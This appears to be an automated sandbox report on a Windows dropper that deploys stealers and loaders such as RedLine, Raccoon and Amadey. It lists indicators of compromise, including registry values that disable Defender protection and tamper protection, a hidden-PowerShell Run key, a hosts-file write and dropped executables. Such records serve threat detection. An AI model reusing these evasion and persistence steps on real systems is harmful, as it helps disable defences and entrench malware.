Malware Analysis Report

2025-06-16 01:30

Sample ID 231031-mjk5cshc85
Target 1683c438c813733a324aba4dc75fd5d9923538aa41e16ad9e11e422d6ed8bc77
SHA256 d35fe3e38292d766814586a9a6451dbfc104893aaf1dc9b84d69a3022987794f
Tags
amadey dcrat glupteba raccoon redline sectoprat smokeloader zgrat 6a6a005b9aa778f606280c5fa24ae595 @ytlogsbot grome kinza pixelnew up3 backdoor paypal collection discovery dropper evasion infostealer loader persistence phishing rat spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

d35fe3e38292d766814586a9a6451dbfc104893aaf1dc9b84d69a3022987794f

Threat Level: Known bad

The file 1683c438c813733a324aba4dc75fd5d9923538aa41e16ad9e11e422d6ed8bc77 was found to be: Known bad.

Malicious Activity Summary

RedLine payload

Glupteba

SectopRAT payload

Suspicious use of NtCreateUserProcessOtherParentProcess

SmokeLoader

SectopRAT

Modifies Windows Defender Real-time Protection settings

DcRat

ZGRat

Detect ZGRat V1

Glupteba payload

RedLine

Raccoon

Amadey

Raccoon Stealer payload

Stops running service(s)

Drops file in Drivers directory

Downloads MZ/PE file

Blocklisted process makes network request

Executes dropped EXE

Checks computer location settings

Windows security modification

Loads dropped DLL

Reads user/profile data of web browsers

Accesses cryptocurrency files/wallets, possible credential harvesting

Looks up external IP address via web service

Adds Run key to start application

Accesses Microsoft Outlook profiles

Checks installed software on the system

Suspicious use of SetThreadContext

Detected potential entity reuse from brand paypal.

Launches sc.exe

Drops file in Program Files directory

Enumerates physical storage devices

Unsigned PE

Program crash

Suspicious use of SendNotifyMessage

Suspicious behavior: GetForegroundWindowSpam

outlook_win_path

Enumerates system info in registry

Suspicious behavior: MapViewOfSection

Checks SCSI registry key(s)

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious behavior: EnumeratesProcesses

Suspicious use of FindShellTrayWindow

outlook_office_path

Creates scheduled task(s)

Suspicious use of AdjustPrivilegeToken

Uses Task Scheduler COM API

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-10-31 10:29

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-10-31 10:29

Reported

2023-10-31 10:33

Platform

win10v2004-20231023-en

Max time kernel

154s

Max time network

163s

Command Line

C:\Windows\Explorer.EXE

Signatures

Amadey

trojan amadey

DcRat

rat infostealer dcrat
Description | Indicator | Process | Target
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\1683c438c813733a324aba4dc75fd5d9923538aa41e16ad9e11e422d6ed8bc77.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A

Detect ZGRat V1

Description Indicator Process Target
N/A N/A N/A N/A

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description | Indicator | Process | Target
Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | C:\Users\Admin\AppData\Local\Temp\953A.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | C:\Users\Admin\AppData\Local\Temp\953A.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | C:\Users\Admin\AppData\Local\Temp\953A.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Users\Admin\AppData\Local\Temp\953A.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | C:\Users\Admin\AppData\Local\Temp\953A.exe | N/A

Raccoon

stealer raccoon

Raccoon Stealer payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A

SmokeLoader

trojan backdoor smokeloader

ZGRat

rat zgrat

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\system32\rundll32.exe N/A

Downloads MZ/PE file

Drops file in Drivers directory

Description | Indicator | Process | Target
File created | C:\Windows\System32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\latestX.exe | N/A

Stops running service(s)

evasion

Checks computer location settings

Description | Indicator | Process | Target
Key value queried | \REGISTRY\USER\S-1-5-21-1114462139-3090196418-29517368-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\5344.exe | N/A
Key value queried | \REGISTRY\USER\S-1-5-21-1114462139-3090196418-29517368-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\ea7c8244c8\Utsysc.exe | N/A
Key value queried | \REGISTRY\USER\S-1-5-21-1114462139-3090196418-29517368-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\A0F4.exe | N/A
Key value queried | \REGISTRY\USER\S-1-5-21-1114462139-3090196418-29517368-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\5LA0Qy2.exe | N/A
Key value queried | \REGISTRY\USER\S-1-5-21-1114462139-3090196418-29517368-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe | N/A
Key value queried | \REGISTRY\USER\S-1-5-21-1114462139-3090196418-29517368-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\C3FE.exe | N/A
Key value queried | \REGISTRY\USER\S-1-5-21-1114462139-3090196418-29517368-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\40F2.exe | N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\fW6dc11.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\iq5Yd73.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\xE2nG14.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\TA1NW08.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\gm9Tl08.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1Jw97Hn3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2ra5653.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3hY38Ib.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\4WX861vQ.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\5LA0Qy2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\6YX3Uu6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\7mK1fU19.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6915.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\vT7qt1Km.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6FBD.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\eG7XH4HQ.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\tM6SC9Xu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\86F1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\953A.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\KE7RO4Oi.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\9B85.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1JH61ge1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\A0F4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2mU933lv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\C3FE.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\F725.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1145.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\281A.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\40F2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\4DB5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\kos4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5344.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\latestX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ea7c8244c8\Utsysc.exe N/A

Reads user/profile data of web browsers

spyware stealer

Windows security modification

evasion trojan
Description | Indicator | Process | Target
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" | C:\Users\Admin\AppData\Local\Temp\953A.exe | N/A

Accesses Microsoft Outlook profiles

collection
Description | Indicator | Process | Target
Key opened | \REGISTRY\USER\S-1-5-21-1114462139-3090196418-29517368-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\40F2.exe | N/A
Key opened | \REGISTRY\USER\S-1-5-21-1114462139-3090196418-29517368-1000\SOFTWARE\Microsoft\Office\12.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\40F2.exe | N/A
Key opened | \REGISTRY\USER\S-1-5-21-1114462139-3090196418-29517368-1000\SOFTWARE\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\40F2.exe | N/A
Key opened | \REGISTRY\USER\S-1-5-21-1114462139-3090196418-29517368-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\40F2.exe | N/A
Key opened | \REGISTRY\USER\S-1-5-21-1114462139-3090196418-29517368-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\40F2.exe | N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description | Indicator | Process | Target
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\6915.exe | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\vT7qt1Km.exe | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\eG7XH4HQ.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-1114462139-3090196418-29517368-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\socks5 = "powershell.exe -windowstyle hidden -Command \"& 'C:\\Users\\Admin\\AppData\\Local\\Temp\\F725.exe'\"" | C:\Users\Admin\AppData\Local\Temp\F725.exe | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\fW6dc11.exe | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\iq5Yd73.exe | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\xE2nG14.exe | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\TA1NW08.exe | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\1683c438c813733a324aba4dc75fd5d9923538aa41e16ad9e11e422d6ed8bc77.exe | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup5 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP005.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\gm9Tl08.exe | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\tM6SC9Xu.exe | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\KE7RO4Oi.exe | N/A

Checks installed software on the system

discovery

Looks up external IP address via web service

Description | Indicator | Process | Target
N/A | api.ipify.org | N/A | N/A
N/A | api.ipify.org | N/A | N/A

Detected potential entity reuse from brand paypal.

phishing paypal

Drops file in Program Files directory

Description | Indicator | Process | Target
File created | C:\Program Files\Google\Chrome\updater.exe | C:\Users\Admin\AppData\Local\Temp\latestX.exe | N/A

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description | Indicator | Process | Target
Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3hY38Ib.exe | N/A
Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3hY38Ib.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\toolspub2.exe | N/A
Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\toolspub2.exe | N/A
Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\toolspub2.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3hY38Ib.exe | N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Enumerates system info in registry

Description | Indicator | Process | Target
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3hY38Ib.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3hY38Ib.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3hY38Ib.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A
